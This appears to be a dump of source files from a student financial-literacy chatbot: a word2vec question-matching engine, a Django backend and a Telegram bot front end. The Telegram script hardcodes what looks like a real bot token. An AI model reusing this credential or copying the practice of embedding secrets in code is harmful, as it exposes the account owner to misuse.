"text": "# Standard suite\nimport csv\nimport numpy as np\nimport time\nimport warnings\nimport traceback\nwarnings.filterwarnings(action='ignore', category=UserWarning, module='gensim')\nimport random\n\n# Word embedding module\nimport gensim\n\n# NLP modules\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk import pos_tag\nfrom autocorrect import spell\n\n# Vector comparison module\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nstart_time = time.clock()\nmodel = gensim.models.KeyedVectors.load_word2vec_format(r\".\\GoogleNews-vectors-negative300.bin.gz\", binary=True)#, limit = 5000)\nend_time = time.clock()\nprint('Embeddings successfully loaded!')\nprint('Time elapsed:', end_time - start_time, 'seconds')\ndatarows = []\nclass question:\n def __init__(self, string):\n self.string = string\n self.all_keywords = None\n self.unprocessed_keywords = None\n self.processed_keywords = None\n self.interrogative = None\n self.vector = None\n\nclass datarow:\n def __init__(self, question):\n self.question = question\n self.answer = None\n self.interrogative = None\n self.vector = None\n\nclass result:\n def __init__(self, question, sim, interrogative, answer):\n self.question = question\n self.sim = sim\n self.interrogative = interrogative\n self.answer = answer\n\n\ndef load_csv_into_memory(df):\n \"\"\" Load dataset into memory. Run once at the start of application.\n\n Keyword arguments:\n directory -- file directory of .csv file with question-answer pairs\n\n \"\"\"\n loaded_vectors = []\n\n for index, row in df.iterrows():\n try:\n current = datarow(row[\"question\"])\n current.answer = row[\"answer\"]\n current.interrogative = row[\"interrogative\"]\n datarows.append(current)\n\n # Process read-in line\n keyword_list, unprocessed_words, vector = process(row[\"question\"])\n current.vector = vector\n\n while 'i' in keyword_list:\n keyword_list.remove('i')\n\n if np.isnan(current.vector[0]):\n print(\"ZERO VECTOR ALERT\")\n continue\n\n except:\n print(\"FAIL\")\n traceback.print_exc()\n continue\n\n print(\"Datarows loaded: {}\".format(len(datarows)))\n\n\ndef process(question, debug = False):\n \"\"\" Processes a string question, identifying keywords and computing its semantic vector.\n\n Keyword arguments:\n question -- string representation of a question\n\n Returns:\n keyword_list -- identified keywords in the input question\n semantics_vector -- semantics vector of the input question\n\n \"\"\"\n keyword_list = get_lemmatized_keywords(question, debug)\n semantics_vector, unprocessed_words = get_semantics_vector(keyword_list, debug)\n\n return keyword_list, unprocessed_words, semantics_vector\n\n\ndef get_lemmatized_keywords(question, debug = False):\n \"\"\" Process a question.\n\n Keyword arguments:\n question -- question provided in string form\n\n Returns:\n keyword_list -- list of string keywords\n sentence_vector -- symantic row vector of length 300 representing meaning of the word, created by summing the word vectors\n of keywords in the question and dividing the result by the number of keywords\n \"\"\"\n\n # Tokenize\n tokenized_data = word_tokenize(question)\n\n # Cast to lower-case\n tokenized_lower = []\n for word in tokenized_data:\n tokenized_lower.append(word.lower())\n\n # Remove stop words\n tokenized_lower_stopwords = remove_stopwords(tokenized_lower)\n\n # Spellcheck\n tokenized_lower_stopwords_spellchecked = spellcheck(tokenized_lower_stopwords, debug)\n\n # Part-of-speech 
tagging/keyword extraction\n keyword_list = extract_keywords(tokenized_lower_stopwords_spellchecked)\n\n # Lemmatize\n keyword_list_lemmatized = lemmatize(keyword_list)\n\n # Cast to US-English\n keyword_list_lemmatized_casted = []\n for word in keyword_list_lemmatized:\n keyword_list_lemmatized_casted.append(uk_to_us(word))\n\n return keyword_list_lemmatized_casted\n\n\ndef get_semantics_vector(word_list, debug = False):\n \"\"\" Get semantics vector of a list of words by averaging over the semantics vector of each individual word.\n\n Keyword arguments:\n word_list -- list of strings to be averaged over\n\n Returns:\n semantics_vector -- average semantics vector of the input list of strings\n \"\"\"\n\n unprocessed_words = []\n\n semantics_vector = np.zeros(300,)\n word_count = 0\n miscount = 0\n for word in word_list:\n try:\n semantics_vector += model.get_vector(word)\n word_count += 1\n except KeyError:\n if debug:\n miscount += 1\n print(\"{} word not found in dictionary ({})\".format(miscount, word))\n unprocessed_words.append(word)\n if word_count > 0:\n semantics_vector /= word_count\n\n return semantics_vector, unprocessed_words\n\n\ndef uk_to_us(uk_in):\n with open(r'.\\uk_to_us.csv', mode='r') as infile:\n reader = csv.reader(infile)\n conversion_dict = {rows[0]:rows[1] for rows in reader}\n\n try:\n us_out = conversion_dict[uk_in]\n return us_out\n except:\n return uk_in\n\n\ndef remove_stopwords(word_list):\n \"\"\" Remove stopwords from a list of words.\n\n Keyword arguments:\n word_list -- list of strings from which stopwords should be removed from\n\n Returns:\n word_list_out -- list of strings with stopwords removed\n \"\"\"\n\n word_list_out = []\n stopWords = set(stopwords.words('english'))\n\n # Adding custom stopwords\n stopWords.add('pregnant')\n stopWords.add('pregnancy')\n stopWords.remove('more')\n\n for word in word_list:\n if word not in stopWords:\n word_list_out.append(word)\n\n return word_list_out\n\n\ndef spellcheck(word_list, debug = False):\n \"\"\" Spellcheck a list of words using the autocorrect library.\n\n Keyword arguments:\n word_list -- list of strings to be spellchecked\n\n Returns:\n spellchecked_word_list -- list of spellchecked strings\n \"\"\"\n\n spellchecked_word_list = []\n for word in word_list:\n spellchecked_word_list.append(word) #spell(word)\n\n if debug:\n print(\"Keywords before spellcheck: \\t{}\".format(word_list))\n print(\"Keywords after spellcheck: \\t{}\".format(spellchecked_word_list))\n\n return spellchecked_word_list\n\ndef extract_keywords(word_list):\n \"\"\" Extract keywords from a list of strings using their POS tag.\n\n Keyword arguments:\n word_list -- list of strings to be checked for importance\n\n Returns:\n keyword_list -- list of keyword strings\n \"\"\"\n\n singulars = []\n for word in word_list:\n if len(word) == 1:\n singulars.append(word)\n\n word_list = [word for word in word_list if word not in singulars]\n\n tup_list = pos_tag(word_list)\n target_tags = {'NN', 'NNS', 'NNP', 'NNPS', 'VB', 'VBD', 'VBG', 'VBN', 'JJ', 'JJR', 'JJS', 'WRB', 'MD',\n 'CD', 'RB', 'RBR', 'RBS', 'JJ', 'JJR', 'JJS', 'IN'}\n keyword_list = []\n\n for tup in tup_list:\n if tup[1] in target_tags:\n keyword_list.append(tup)\n\n return keyword_list\n\ndef lemmatize(word_list):\n \"\"\" Lemmatize a list of words using their POS tag if possible.\n\n Keyword arguments:\n word_list -- list of strings to be lemmatized\n\n Returns:\n word_list_lemmatized -- list of lemmatized strings\n \"\"\"\n\n wordnet_lemmatizer = WordNetLemmatizer()\n 
word_list_lemmatized = []\n\n for word in word_list:\n if word[0].isalpha():\n try:\n word_list_lemmatized.append(wordnet_lemmatizer.lemmatize(word[0], pos=penn_to_wn(word[1])))\n except:\n try:\n word_list_lemmatized.append(wordnet_lemmatizer.lemmatize(word[0]))\n except:\n pass\n\n return word_list_lemmatized\n\ndef find_interrogative(q):\n interrogative_words = ['who', 'why', 'where', 'what', 'when', 'how', 'can', 'should', 'will', 'do']\n prime_interrogative_words = ['who', 'why', 'where', 'what', 'when', 'how']\n\n interrogatives_identified = []\n\n for word in q.string.lower().split():\n if word in interrogative_words:\n interrogatives_identified.append(word)\n\n interrogatives_identified = ['should' if inter == \"can\" else inter for inter in interrogatives_identified]\n\n if len(interrogatives_identified) == 1:\n q.interrogative = interrogatives_identified[0]\n return interrogatives_identified[0]\n elif len(interrogatives_identified) > 1:\n for inter in interrogatives_identified:\n if inter in prime_interrogative_words:\n q.interrogative = inter\n return inter\n q.interrogative = interrogatives_identified[0]\n return interrogatives_identified[0]\n\n\n\ndef sim_to_question(sim, results):\n for result in results:\n if (abs(sim-result.sim) < 1e-9):\n return result.question\n print(\"SIMILARITY LOOKUP ERROR\")\n\ndef question_to_datarow(question, datarows):\n for datarow in datarows:\n if question == datarow.question:\n return datarow\n print(\"DATAROW LOOKUP ERROR\")\n\n\ndef query(q, debug = False):\n \"\"\" Query the dataset.\n\n Keyword arguments:\n q -- question object\n debug -- set boolean as True to also print predicted question\n\n Returns:\n target answer -- predicted answer in string form\n\n \"\"\"\n #probability\n\n prb = []\n\n ## QUESTION:\n\n quest = []\n\n # results\n results = []\n \n # Process s using engine import\n q.all_keywords, q.unprocessed_keywords, q.vector = process(q.string, debug)\n q.vector = np.reshape(q.vector, (1, -1))\n find_interrogative(q)\n\n q.processed_keywords = [word for word in q.all_keywords if word not in q.unprocessed_keywords]\n\n print(\"Final processed keywords:\\t{}\".format(q.processed_keywords))\n\n # Iterate through all dataset questions, storing dataset question-similarity pairs in similarity_dict\n similarity_dict = {}\n similarity_list = []\n\n for row in datarows:\n try:\n comparison_sentence_vector = np.reshape(row.vector, (1, -1))\n sim = cosine_similarity(comparison_sentence_vector, q.vector)[0][0]\n results.append(result(row.question, sim, row.interrogative, row.answer))\n # similarity_list.append(sim)\n except:\n print(\"RUH-ROH\")\n print(\"Subject 1: {}\".format(comparison_sentence_vector))\n print(\"Subject 2: {}\".format(q.vector))\n\n ## DEVSPACE\n results.sort(key=lambda x: x.sim, reverse=True)\n print('length of results:' + str(len(results)))\n # print(results.sim)\n # similarity_list.sort(reverse=True)\n # count = 1\n\n\n print('\\n')\n print(\"Input question: {}\".format(q.string))\n\n # No interrogative\n # if not q.interrogative:\n # print(\"NO INTERROGATIVE IDENTIFIED\")\n # # Check for relevant symptom datarow\n # i = 0\n # num_ans = 0\n # while True:\n # sim = similarity_list[i]\n # if sim < 0.7:\n # break\n\n # current_question = sim_to_question(sim, results)\n # current_datarow = question_to_datarow(current_question, datarows)\n # # Last part of line below is debatable\n # if (current_datarow.interrogative == 'symptom' or current_datarow.interrogative == 'what'):\n # print(\"[{:.4f}] Predicted question v1: 
\\t{}\".format(sim, current_question))\n # prb.append(sim)\n # quest.append(current_question)\n # similarity_list.remove(sim)\n # num_ans+=1\n # i+=1\n # # Relevant datarow not found\n # i = 0\n # while True:\n # sim = similarity_list[i]\n # if sim < 0.6:\n # break\n\n # current_question = sim_to_question(sim, results)\n # current_datarow = question_to_datarow(current_question, datarows)\n # print(\"[{:.4f}] Potential question v2: \\t{}\".format(sim, current_question))\n # prb.append(sim)\n # quest.append(current_question)\n # similarity_list.remove(sim)\n # i+=1\n\n # Have interrogative\n # else:\n # # Find datarow with correct interrogative\n # print(\"INTERROGATIVE IDENTIFIED: {}\".format(q.interrogative))\n # i = 0\n # while True:\n # sim = similarity_list[i]\n # if sim < 0.7:\n # break\n # current_question = sim_to_question(sim, results)\n # current_datarow = question_to_datarow(current_question, datarows)\n # if current_datarow.interrogative == q.interrogative:\n # print(\"[{:.4f}] Potential question v3: \\t{}\".format(sim, current_question))\n # prb.append(sim)\n # quest.append(current_question)\n # similarity_list.remove(sim)\n # i+=1\n\n # # No datarow with correct interrogative found, offer related datarows with strict criteria\n # i = 0\n # while True:\n # sim = similarity_list[i]\n # if sim < 0.8:\n # break\n # current_question = sim_to_question(sim, results)\n # current_datarow = question_to_datarow(current_question, datarows)\n # print(\"[{:.4f}] Potential question v4: \\t{}\".format(sim, current_question))\n # prb.append(sim)\n # quest.append(current_question)\n\n # similarity_list.remove(sim)\n # i+=1\n\n # # No datarow with correct interrogative found, offer symptoms\n # i = 0\n # while True:\n # sim = similarity_list[i]\n # if sim < 0.5:\n # break\n # current_question = sim_to_question(sim, results)\n # current_datarow = question_to_datarow(current_question, datarows)\n # if current_datarow.interrogative == 'symptom':\n # print(\"[{:.4f}] Potential question v5: \\t{}\".format(sim, current_question))\n # prb.append(sim)\n # quest.append(current_question)\n # similarity_list.remove(sim)\n # i+=1\n\n print(\"SEARCH OVER\")\n print(\"\\n\")\n\n if len(results) == 0:\n return {\"sim\": 0, \"answer\":random.choice(datarows).answer}\n\n else:\n # maxsim = max(prb)\n # idx = prb.index(maxsim)\n # ans = returnasw(quest[idx])\n\n seen_titles = set()\n new_results = []\n for obj in results:\n if obj.question not in seen_titles:\n new_results.append(obj)\n seen_titles.add(obj.question)\n\n maxsim = results[0].sim\n ans = results[0].answer\n print('ans: ' + ans) \n additionalRes = [x for x in new_results if x.sim > 0.5]\n return {\"sim\": maxsim, \"answer\":ans, 'additionalRes':additionalRes}\n\ndef returnasw(qn):\n for item in datarows:\n if item.question == qn:\n return item.answer\n return \"\"\n\n\nfrom nltk.corpus import wordnet as wn\n\ndef is_noun(tag):\n return tag in ['NN', 'NNS', 'NNP', 'NNPS']\n\ndef is_verb(tag):\n return tag in ['VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ']\n\ndef is_adverb(tag):\n return tag in ['RB', 'RBR', 'RBS']\n\ndef is_adjective(tag):\n return tag in ['JJ', 'JJR', 'JJS']\n\ndef penn_to_wn(tag):\n if is_adjective(tag):\n return wn.ADJ\n elif is_noun(tag):\n return wn.NOUN\n elif is_adverb(tag):\n return wn.ADV\n elif is_verb(tag):\n return wn.VERB\n return None\n\n\n#v1: no interrogative, have relevant SYMPTOM or WHAT QUESTION\n#v2: no interrogative, have relevant CONTENT\n#v3: have interrogative, correct interrogative found\n#v4: have interrogative, no 
correct interrogative found but have strictly relevant datarow\n#v5: have interrogative, no correct interrogative found but have relevant SYMPTOM\n\n#input_qn = question(\"What is Intangible Assets?\")\n#print(\"Predicted answer: \\t{}\".format(query(input_qn, debug=True)))\n"
},
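`query.py` above answers a question by averaging word vectors and ranking stored questions by cosine similarity. A toy end-to-end version of that retrieval loop follows, with hand-made 3-dimensional "embeddings" standing in for the 300-dimensional word2vec vectors, so it runs without the multi-gigabyte GoogleNews binary:

```python
import numpy as np
from sklearn.metrics.pairwise import cosine_similarity

# Toy word vectors; word2vec would supply 300-d vectors instead.
vec = {
    'asset':      np.array([1.0, 0.1, 0.0]),
    'intangible': np.array([0.9, 0.0, 0.2]),
    'loan':       np.array([0.0, 1.0, 0.1]),
    'interest':   np.array([0.1, 0.9, 0.0]),
}

def sentence_vector(words):
    # Average the vectors of known words, as get_semantics_vector does.
    known = [vec[w] for w in words if w in vec]
    return np.mean(known, axis=0).reshape(1, -1)

corpus = {
    'what is an intangible asset': ['intangible', 'asset'],
    'how is loan interest computed': ['loan', 'interest'],
}

q = sentence_vector(['asset', 'intangible'])
best = max(corpus,
           key=lambda k: cosine_similarity(sentence_vector(corpus[k]), q)[0][0])
print(best)  # 'what is an intangible asset'
```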
{
"alpha_fraction": 0.6960784196853638,
"alphanum_fraction": 0.7352941036224365,
"avg_line_length": 26.81818199157715,
"blob_id": "9df7ff5464cd146383e62761e128de0e4d6c706f",
"content_id": "cf9c499c5b039dd233ee3520b9800bf97847fc4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 306,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 11,
"path": "/BC3409DEMO/main/models.py",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n\nclass Database(models.Model):\n\n question = models.CharField(max_length=2000, blank=False)\n answer = models.CharField(max_length=2000, blank=False)\n interrogative = models.CharField(max_length=2000, blank=False)\n app_label = 'Database'\n\n# Create your models here.\n"
},
{
"alpha_fraction": 0.6853932738304138,
"alphanum_fraction": 0.6853932738304138,
"avg_line_length": 21.25,
"blob_id": "a993a3d1edbc34d809b7f847efbc071c96a04dc9",
"content_id": "0925ca7cd537a06cc65f67d104daa5d598313953",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 445,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 20,
"path": "/BC3409DEMO/main/admin.py",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Database\n\n# Register your models here.\n\n\nclass DatabaseAdmin(admin.ModelAdmin):\n list_display = ('pk', 'question', 'answer')\n list_filter = ('question', 'answer')\n search_fields = ['pk', 'question', 'answer']\n\n def account_query(self, obj):\n return obj.account\n\n account_query.admin_order_field = 'account_query'\n\n pass\n\n\nadmin.site.register(Database, DatabaseAdmin)\n"
},
{
"alpha_fraction": 0.6470588445663452,
"alphanum_fraction": 0.6524063944816589,
"avg_line_length": 27.049999237060547,
"blob_id": "47f6463851228802f2635ca7ff8b35440d3faff8",
"content_id": "8e2e1becaa5fc7ec62ae30687dbb9994a120317f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 561,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 20,
"path": "/BC3409DEMO/importing.py",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "import csv\nfrom datetime import datetime\nfrom main.models import Database\n\nDatabase.objects.all().delete()\nwith open('question.csv', 'r') as csvfile:\n reader = csv.DictReader(csvfile)\n\n for row in reader:\n question = list(row.values())[0]\n print(question)\n answer = list(row.values())[1]\n print(answer)\n interrogative = list(row.values())[2]\n print(interrogative)\n\n new_db = Database(question=question, answer=answer, interrogative=interrogative)\n new_db.save()\n\n# exec(open('importing.py').read())\n"
},
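`importing.py` above reads columns positionally via `list(row.values())[0]`, which silently breaks if the CSV column order changes. `csv.DictReader` already supports access by header name; a standalone sketch with inline sample data so it runs without `question.csv`:

```python
import csv
import io

sample = (
    "question,answer,interrogative\n"
    "What is an asset?,A resource with economic value.,what\n"
)

for row in csv.DictReader(io.StringIO(sample)):
    # Keyed access survives column reordering; positional access does not.
    print(row['question'], '->', row['answer'], '(', row['interrogative'], ')')
```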
{
"alpha_fraction": 0.6129032373428345,
"alphanum_fraction": 0.6524926424026489,
"avg_line_length": 21,
"blob_id": "c7177bdd2d8ebc15c25ce6356ee130c3491ceca3",
"content_id": "94c728ce29f65b31b283c2be79554e6524a68eeb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 682,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 31,
"path": "/Telegram/main.py",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3.6\nimport telepot\nimport time\nfrom slugify import slugify\nimport requests\nbot = telepot.Bot('1003067694:AAFxSzzj4y_fl-5OcJPDeOSoEkzANknuqyY')\nurl = \"http://127.0.0.1:8000/ask/\"\n\n\ndef handle(msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n print(content_type, chat_type, chat_id)\n\n if content_type == 'text':\n\n slug = slugify(msg[\"text\"])\n\n ans = requests.get(url + slug).json()\n\n #bot.sendMessage(chat_id, \"slugify '{}'\".format(slug))\n\n bot.sendMessage(chat_id, \"Answer:\\n\"+\" '{}'\".format(ans['answer']))\n\n\nbot.message_loop(handle)\n\nprint('Listening ...')\n\n# Keep the program running.\nwhile 1:\n time.sleep(10)\n"
},
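The bot above turns every incoming message into a URL path segment with `slugify` before hitting the Django endpoint, which is why `views.askchatbot` has to undo it with `slug.replace("-", " ")`. The transformation in isolation (assumes `python-slugify` is installed; the request line is commented out since it needs the local server running):

```python
from slugify import slugify

question = "What is an Intangible Asset?"
slug = slugify(question)
print(slug)  # what-is-an-intangible-asset

url = 'http://127.0.0.1:8000/ask/' + slug
print(url)
# import requests; print(requests.get(url).json())  # needs the Django server up
```

Note the round trip is lossy: case and punctuation are gone. That is harmless here because the query pipeline lowercases and strips punctuation anyway.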
{
"alpha_fraction": 0.7333333492279053,
"alphanum_fraction": 0.8222222328186035,
"avg_line_length": 21.5,
"blob_id": "f484a308c0a3d60ed937ba492d86583953355782",
"content_id": "94ba7137f51886b603c19a51f7319c21f096480e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 45,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 2,
"path": "/README.md",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "# BC3409-chatbot\n financial literacy chatbot\n"
},
{
"alpha_fraction": 0.5359628796577454,
"alphanum_fraction": 0.5870069861412048,
"avg_line_length": 21.6842098236084,
"blob_id": "65e8d395420da6de837f3ddf762a59fc71fd2c95",
"content_id": "79f9db0f979a1f88ae631df6b378534254b224f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 19,
"path": "/BC3409DEMO/main/migrations/0002_database_interrogative.py",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2 on 2019-04-13 13:42\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='database',\n name='interrogative',\n field=models.CharField(default='what', max_length=2000),\n preserve_default=False,\n ),\n ]\n"
},
{
"alpha_fraction": 0.5984450578689575,
"alphanum_fraction": 0.603908360004425,
"avg_line_length": 29.902597427368164,
"blob_id": "eb4e8b6c7d1a5d6a2930726f7958b51f3debf975",
"content_id": "dbe0a01295d75023e10138bb09cbc3a88001befb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4759,
"license_type": "no_license",
"max_line_length": 172,
"num_lines": 154,
"path": "/BC3409DEMO/main/views.py",
"repo_name": "tt2615/BC3409-chatbot",
"src_encoding": "UTF-8",
"text": "import csv\nimport numpy as np\nimport time\nimport warnings\nwarnings.filterwarnings(action='ignore', category=UserWarning, module='gensim')\n\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nfrom django.shortcuts import render, render_to_response\nfrom django.shortcuts import render\nimport main\n\nfrom django.http import HttpResponse\nimport simplejson as json\n\n# Create your views here.\n# import it\nfrom django.http import JsonResponse\n\nfrom .models import Database\n\nimport pandas as pd\n\n# Vector comparison module\nimport os\nfrom . import query\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nimport simplejson as json\nfrom django.http import HttpResponse\nimport csv\n# Create your views here.\n# import it\nfrom django.core.mail import send_mail\n\nfrom django.http import JsonResponse\nsize = 0\n\ndef askchatbot(request, slug):\n # global question_to_vector\n # global question_to_answer\n # global vector_to_question\n global additionalRes\n\n # do something with the your data\n print('System is processing your question...')\n unslug = slug.replace(\"-\", \" \")\n print('query content: ' + unslug)\n result = Database.objects.all().values()\n df = pd.DataFrame(result)\n\n if unslug == ('y' or 'Y'):\n print('enter yes')\n response_data = {'answer': 'Ask me another question if you want'}\n\n elif unslug == ('n' or 'N') and len(additionalRes)>0:\n print('enter no')\n addQn = ''\n i = 1\n for res in additionalRes:\n if i > 10:\n break\n addQn += str(i) + ': ' + res.question + '\\n'\n i += 1\n print(addQn)\n\n response_data = {'answer': 'Do you mean any of the questions below: \\n' + addQn + '\\nPlease enter question number to see the answer'}\n\n elif unslug.isdigit() and len(additionalRes)>0:\n print('enter qns selection')\n index = int(unslug)\n print(index)\n selection = additionalRes[index-1]\n print(selection)\n response_data = {'answer': selection.answer + '\\n\\nKey in another question number to see more answer or ask me a new question'}\n\n else:\n if size == df.shape[0]:\n pass\n else:\n query.load_csv_into_memory(df)\n # response = HttpResponse (content_type='text/csv')\n # writer = csv.writer(open(\"qna.csv\", \"w\", encoding='utf-8',newline=''))\n # for item in Database.objects.values_list('question','answer'):\n # writer.writerow(item)\n # question_to_vector, question_to_answer, vector_to_question = load_csv_into_memory(\"C:\\\\Users\\\\KangYu\\\\Desktop\\\\BC3409\\\\BC3409DEMO\\\\qna.csv\",\"utf-8\")\n input_qn = query.question(unslug)\n result = query.query(input_qn, True)\n additionalRes = result['additionalRes']\n\n if result[\"sim\"] < 0.5:\n response_data = {'answer': \"Answer may not be what you want but we are working on it!\\n\" + result[\"answer\"]}\n\n send_mail(\n 'UNKNOWN QN REPLY ASAP',\n unslug,\n '[email protected]',\n ['[email protected]'],\n fail_silently=False,\n )\n\n response_data = {'answer': result[\"answer\"] + '\\n\\nIs this what you want?\\nkey in Y for Yes to answer another question\\nkey in N for No to view similar questions.'}\n\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\n\n@csrf_exempt\ndef get_response(request):\n response = {'status': None}\n\n if request.method == 'POST':\n data = json.loads(request.body)\n message = data['message']\n\n result = Database.objects.all().values()\n df = pd.DataFrame(result)\n\n if size == df.shape[0]:\n pass\n else:\n query.load_csv_into_memory(df)\n\n input_qn = query.question(message)\n result = 
query.query(input_qn, True)\n\n if result[\"sim\"] < 0.5:\n chat_response = {'answer': \"Answer may not be what you want but we are working on it!\\n\" + result[\"answer\"]}\n send_mail(\n 'UNKNOWN QN REPLY ASAP',\n message,\n '[email protected]',\n ['[email protected]'],\n fail_silently=False,\n )\n\n else:\n chat_response = {'answer': result[\"answer\"]}\n\n\n response['message'] = {'text': chat_response[\"answer\"], 'user': False, 'chat_bot': True}\n response['status'] = 'ok'\n\n else:\n response['error'] = 'no post data found'\n\n return HttpResponse(\n json.dumps(response),\n content_type=\"application/json\"\n )\n\n\ndef home(request, template_name=\"home.html\"):\n context = {'title': 'Chatbot Version 1.0'}\n return render_to_response(template_name, context)\n"
}
] | 8 |
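`get_response` above expects a JSON body with a `message` field (it calls `json.loads(request.body)`). A client-side sketch of calling it with `requests`; the `/get_response/` path is an assumption for illustration, since the route for that view is not shown in the repo:

```python
import requests

# Path '/get_response/' is hypothetical; check the project's urls.py.
resp = requests.post(
    'http://127.0.0.1:8000/get_response/',
    json={'message': 'What is an intangible asset?'},  # sent as the JSON body
)
print(resp.json())  # expected shape: {'status': 'ok', 'message': {'text': ..., ...}}
```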
denkovade/sysadm | https://github.com/denkovade/sysadm | af2c8d750e469e58dd1205dba610aff9b263d6e1 | 3d3226f854217639229fac82ff66cbec9db8fb66 | c91fb827bdbe36e46226514420805657154c8d73 | refs/heads/master | 2021-01-02T08:24:00.126837 | 2018-06-05T08:21:33 | 2018-06-05T08:21:33 | 99,002,687 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8121212124824524,
"alphanum_fraction": 0.8121212124824524,
"avg_line_length": 81.5,
"blob_id": "d4f27b266ca9e9a1cbeb9940c668ec5593780bed",
"content_id": "b556aa1eaf143aca350635052d755a0ec276487a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 165,
"license_type": "no_license",
"max_line_length": 155,
"num_lines": 2,
"path": "/README.md",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "# sysadm\nthis repo has been created for my sysadmin learning stuff - notes from books,documentation,scripts and everything what I need in my work and daily training\n"
},
{
"alpha_fraction": 0.7042514085769653,
"alphanum_fraction": 0.709796667098999,
"avg_line_length": 23.636363983154297,
"blob_id": "76a916c42b3081bfa3830ffcbb243fe2227dade2",
"content_id": "17fe6c468d5fd994c4cf833eddd693d764e2d03a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 541,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 22,
"path": "/linux_networking.md",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "# configuring the network\n## Static vs Dynamic:\n* DHCP\n\t* can be statically mapped\n\t* can set hostname\n*Static\n\t* more work to change\n\t* one less point of failure\n## static configuration steps:\n1. set ip -> /etc/sysconfig/network-scripts\n\t* set to static\n2.set gateway ->/etc/sysconfig/network\n\t* and hostname\n\t*/etc/hosts\n3. set dns -> /etc/resolv.conf\n\n# iptables -> configure linux firewall\n- kernel level\n- specifies traffic comming and going\n- is how we do NAT\n```system-confi-firewall-tui``` <br />\n```/etc/sysconfig/iptables``` <br />"
},
{
"alpha_fraction": 0.7325692176818848,
"alphanum_fraction": 0.7491244673728943,
"avg_line_length": 63.081634521484375,
"blob_id": "4407abc843f58ed2718cee639976fb3783947f39",
"content_id": "c3ba13d90d831d84ec43ca2a25f465921c52c602",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3141,
"license_type": "no_license",
"max_line_length": 271,
"num_lines": 49,
"path": "/networking.md",
"repo_name": "denkovade/sysadm",
"src_encoding": "UTF-8",
"text": "# OSI and TCP model\n\n| TCP/IP\t | OSI | Explanation | Protocols |\n|---|---|---|---|\n| Process/ | Application | The Application layer provides services to the software through which the user requests network services. Browsers and FTP client are part of this layer. | FTP, SMTP, POP3, HTTP, TFTP, SSH, DNS, DHCP, NTP, SNMP, Telnet |\n| | Presentation | This layer is concerned with data representation and code formatting. | SSL, TLS, ASCII, MPEG |\n| Application | Session | The Session layer establishes, maintains, and manages the communication session between computers. | NetBIOS, SIP |\n| Host to host | Transport | The functions defined in this layer provide for the reliable transmission of data segments, as well as the disassembly and assembly of the data before and after transmission. | TCP,UDP, RTP |\n| Internet | Network | This is the layer on which routing takes place, and, as a result. It defines the processes used to route data across the network and the structure and use of logical addressing. | IP, BGP, RIP |\n| Network | Data Link | this layer is concerned with the linkages and mechanisms used to move data about the network, including the topology, such as Ethernet or Token Ring, and deals with the ways in which data is reliably transmitted. | Ethernet, Token Ring, PPP |\n| Access | Physical | This layer defines the electrical and physical specifications for the networking media that carry the data bits across a network. | ISDN, DSL, 100Base-Tx |\n\n# TCP model explanations\n- Application Layer: Represents data to the user plus encoding and dialog control\n- Transport Layer: Supports communication between divers devices accrose diverse networks.\n- Internet Layer: Determines the best path through the network\n- Network Accesss Layer: Controls the hardware devices and media that make up the network\n\n# Ports\n|port number range | port group |\n|---|---|\n| 0 to 1023 | well known (contact) port |\n| 1024 to 49151 | registered ports |\n| 49152 to 65535 | private and/or dynamic ports |\n\n# Common TCP port number\nSSH = 22\nTelnet - 23\nDNS = 53\nSMTP = 25\nHTTP = 80\nHTTPS = 443\n\n# Common TCP port number\nDNS = 53\nNTP = 123\nTFTP = 69\n\n- *Data Encapsulation* - each lower layer append its header to the data prior to sending it to the lower layer\n- *Connection - Oriented* - reliable data transfer method that uses acknowledgements ad flow control. An example is TCP\n- *Connectionless-Oriented* - Non reliable best efort data transfer metod with very little overhead. An example is UDP\n- *Socket Number* - combination of IP address and port number defining a source or destination\n- *Port Number* - uniue identifier for both( TCP/UDP) at the transport layer\n\n# Tipical Network Devices\n- Hub - connect multiple devices together making them act as one network segment sing shared 